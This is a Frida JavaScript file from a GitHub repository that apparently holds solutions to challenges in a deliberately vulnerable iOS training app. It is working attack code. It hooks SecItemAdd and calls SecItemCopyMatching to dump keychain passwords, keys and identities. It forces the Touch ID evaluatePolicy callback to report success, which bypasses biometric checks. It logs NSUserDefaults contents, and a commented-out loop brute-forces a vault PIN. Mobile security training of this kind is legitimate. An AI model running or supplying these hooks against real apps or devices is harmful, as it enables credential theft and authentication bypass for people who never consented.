-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathinteract.js
159 lines (138 loc) · 5.56 KB
/
interact.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
function solve301(){
var UIAlertController = ObjC.classes.UIAlertController;
var UIAlertAction = ObjC.classes.UIAlertAction;
var UIApplication = ObjC.classes.UIApplication;
var handler = new ObjC.Block({
retType: 'void',
argTypes: ['object'],
implementation: function () {}
});
ObjC.schedule(ObjC.mainQueue, function () {
var alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_('Success', 'Solved with Frida', 1);
var defaultAction = UIAlertAction.actionWithTitle_style_handler_('OK', 0, handler);
alert.addAction_(defaultAction);
UIApplication.sharedApplication().keyWindow().rootViewController().presentViewController_animated_completion_(alert, true, NULL);
})
}
function solve302(){
Module.enumerateExports("Security", {
onMatch: function(imp) {
if (imp.type == "function" && imp.name == "SecItemAdd") {
Interceptor.attach(imp.address, {
onEnter(args){
var dict = convertDict(ObjC.Object(args[0]));
console.log(`(${dict["svce"]}) ${dict["acct"]} - ${dict["v_Data"]}`)
}
});
}
},
onComplete: function(){
}
});
}
function solve303(){
getkeychain();
}
function solve304(){
// Doesn't always seem to work for some reason ...
const pendingBlocks = new Set();
var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"];
Interceptor.attach(hook.implementation, {
onEnter: function(args) {
console.log("Hooking Touch Id..")
console.log(args[4])
var block = new ObjC.Block(args[4]);
pendingBlocks.add(block); // Keep it alive
const appCallback = block.implementation;
block.implementation = function (error, value) {
const result = appCallback(1, null);
pendingBlocks.delete(block);
return result;
};
},
});
}
function solve305(){
var NSUserDefaults = ObjC.classes.NSUserDefaults;
var setObject = NSUserDefaults["- setObject:forKey:"]
Interceptor.attach(setObject.implementation, {
onEnter(args){
var value = new ObjC.Object(args[2])
var key = new ObjC.Object(args[3])
console.log(`${key} -> ${value}`)
}
})
}
function solve306(){
var NSUserDefaults = ObjC.classes.NSUserDefaults;
console.log( NSUserDefaults["+ standardUserDefaults"]())
var NSDictionary = NSUserDefaults["+ standardUserDefaults"]().dictionaryRepresentation();
console.log(NSDictionary.toString())
}
// util functions
function convertDict(dict){
var keys = dict.allKeys();
var ob = {};
for (var index = 0; index < keys.count(); index++) {
var k = keys.objectAtIndex_(index);
var v = dict.objectForKey_(k);
if (["svce", "pdmn" ,"mdat", "cdat", "agrp"].includes(k.toString())) {
v = new ObjC.Object(v).toString()
}
if(k == "acct" || k == "v_Data"){
var data = new ObjC.Object(v)
v = data.bytes().readUtf8String(data.length());
}
ob[k] = v;
}
return ob;
}
// modified from https://codeshare.frida.re/@lichao890427/ios-utils/
function getConstant(name){
var pptr = Module.findExportByName(null, name);
return ObjC.Object(Memory.readPointer(pptr));
}
function getkeychain() {
var NSMutableDictionary=ObjC.classes.NSMutableDictionary;
var kCFBooleanTrue = getConstant("kCFBooleanTrue");
var kSecReturnAttributes = getConstant("kSecReturnAttributes");
var kSecMatchLimitAll = getConstant("kSecMatchLimitAll");
var kSecMatchLimit = getConstant("kSecMatchLimit");
var kSecReturnData = getConstant("kSecReturnData");
var kSecClassGenericPassword = getConstant("kSecClassGenericPassword");
var kSecClassInternetPassword = getConstant("kSecClassInternetPassword");
var kSecClassCertificate = getConstant("kSecClassCertificate");
var kSecClassKey = getConstant("kSecClassKey");
var kSecClassIdentity = getConstant("kSecClassIdentity");
var kSecClass = getConstant("kSecClass");
var query = NSMutableDictionary.alloc().init();
var SecItemCopyMatching = new NativeFunction(Module.findExportByName(null, "SecItemCopyMatching"), "int", ["pointer", "pointer"]);
[kSecClassGenericPassword, kSecClassInternetPassword, kSecClassCertificate, kSecClassKey,
kSecClassIdentity].forEach(function(secItemClass) {
query.setObject_forKey_(kCFBooleanTrue, kSecReturnAttributes);
query.setObject_forKey_(kSecMatchLimitAll, kSecMatchLimit);
query.setObject_forKey_(secItemClass, kSecClass);
query.setObject_forKey_(kCFBooleanTrue, kSecReturnData);
var result = Memory.alloc(8);
Memory.writePointer(result, ptr("0"));
SecItemCopyMatching(query.handle, result);
var pt = Memory.readPointer(result);
if (!pt.isNull()) {
var nsArray = ObjC.Object(pt);
var count = nsArray.count();
for (var i = 0; i < count; i++) {
var dict = convertDict(nsArray.objectAtIndex_(i));
console.log(`(${dict["svce"]}) ${dict["acct"]} - ${dict["v_Data"]}`)
}
}
}
)
}
// var myVault = VulnerableVault.alloc().init();
// for(var i = 0; i<9999; i++){
// if(myVault["- validate:"](i))
// {
// console.log(i)
// }
// }
// 2.05